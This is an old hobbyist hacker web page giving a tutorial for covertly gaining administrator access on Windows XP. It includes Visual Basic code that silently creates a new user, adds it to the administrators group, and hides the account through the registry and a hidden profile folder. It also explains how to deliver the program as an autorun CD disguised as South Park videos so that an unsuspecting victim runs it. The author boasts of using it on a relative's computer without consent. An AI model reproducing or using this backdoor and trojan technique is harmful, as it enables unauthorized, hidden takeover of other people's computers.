Free Web Hosting by Netfirms
Web Hosting by Netfirms | Free Domain Names by Netfirms


h43k4z needs help with this site if you want to join da team click here!


Alana
Mandy -
Ex
Tonica
Bull
La Shaun
Adrian
Analisa
DarkOneWithANeed
EveryOne At HTS
All hackers in Guyana









You are visitor
Hit Counter

Get Admin Access On xp by h43k4z

This is the only reliable way I have been able to come up with since trying for as long as I can remember. It includes social engineering and a little programming, but it is achieved in the end.

First I will give you an overview of what we are really doing k
here we go.

  • Write the Program that will do the work
  • Burn it to a cd
  • make sure the cd appeals to the victim  umm.. user

And that should be it

NOTE YOU HAVE TO HOLD CTRL +ALT  AND PRESS  DEL TWICE AT THE LOGIN SCREEN TO USE YOUR ACCOUNT.

Write the program
Ok i choose to write it in vb since well that is the easiest and fastest,
the program will be autorun from the cd when it's placed in the cd rom so we don't want it to be seen on screen so make your form not visible and task visible will not really be necessary cause it will only be active for 2 - 3 sec the longest so do what you which there.
In form_load() you will put this code I will explain it later.

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''cut here

On Error Resume Next            'very important (no errors will pop up on screen)

pass = "yourpass"            'change to what you want

usr = "yourusr"            'change to what you want

Shell "net user " & usr & " " & pass & " /add", vbHide            'the net user command you should know this

Sleep 1000            'i place this here cause sometimes the first command is not completed when this is ran, and that                                'should not happen one then the other

Shell "net localgroup administrators " & usr & " /add", vbHide            'this makes you admin :)

Dim value As Long            'this is to set the dword value of the registry must be long or integer

value = 0            '0 to hide 1 to show

result = RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARENT", keyres)            'opening the reg key

result = RegSetValueEx(keyres, usr, 0, 4, value, Len(value))              'Writing the reg key

SetAttr "C:\Documents and Settings\" & usr, vbHidden        'set your settings folder as hidden

end            'i put this here to make sure the program ends immediately

End Sub

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''cut to here

That should be it just compile that and name it something sneaky like Mp3dec.exe or something like that.

Burn To cd
Burn this baby to a cd but hold don't just yet, this is how the cd will be.

you will have to write a autorun.inf file for the cd to autorun when it is placed in the cd rom, this is simple open notepad and type or copy and paste these lines

[autorun]

open = Mp3dec.exe.exe

icon = none.ico

  • [autorun] - this is on the first line
  • open = Mp3dec.exe.exe   - this is on the sec line  :) Mp3dec.exe is whatever you named the prog.
  • icon = icon.ico   - if you have a nice icon to go with the cd then put it on the cd also (root of cd) and change the name, else leave it just like that.
  • lastly save this file as "autorun.inf"  *without quotes
  • Put Mp3dec.exe,  autorun.inf,  icon.ico (optional) and  south park videos (see next section)

NOTE MP3DEC.EXE AUTORUN.INF AND ICON.ICO WILL BE HIDDEN (you can do that right) right click..............

Let The cd Appeal To The User

This is straight forward but very important, this is where social engineering comes in, lets say the victim likes south park then you get your self some south park videos from kazaa (lol) put it in a folder on the cd named south park episodes,
now just burn and we are all set.

Conclusion
I First tried this on my uncles system, because of my hobbies i was not allowed to go on his comp. without him knowing, they would login for me then i got a limited account arrrg.
anyways he wanted to test this game i had and well he had to login as admin to install so he did  and i got admin status to this day he doesn't know lol.

ANOTHER NOTE YOU HAVE TO HOLD CTRL +ALT  AND PRESS  DEL TWICE AT THE LOGIN SCREEN TO USE YOUR ACCOUNT.

h43k4z




 
Copyright © 2003 [kensoft inc.]. All rights reserved.
For problems or questions regarding this Web site contact [h43k4z@ken.cjb.net].
Last updated: 08/18/04.